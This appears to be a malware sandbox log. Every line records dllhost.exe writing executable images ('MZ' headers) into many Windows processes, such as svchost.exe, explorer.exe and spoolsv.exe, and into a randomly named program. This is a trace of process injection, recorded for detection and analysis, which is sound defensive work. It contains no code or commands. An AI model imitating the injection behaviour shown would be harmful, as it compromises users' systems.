Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 8B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: C60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E70000 value starts with: 4D5A
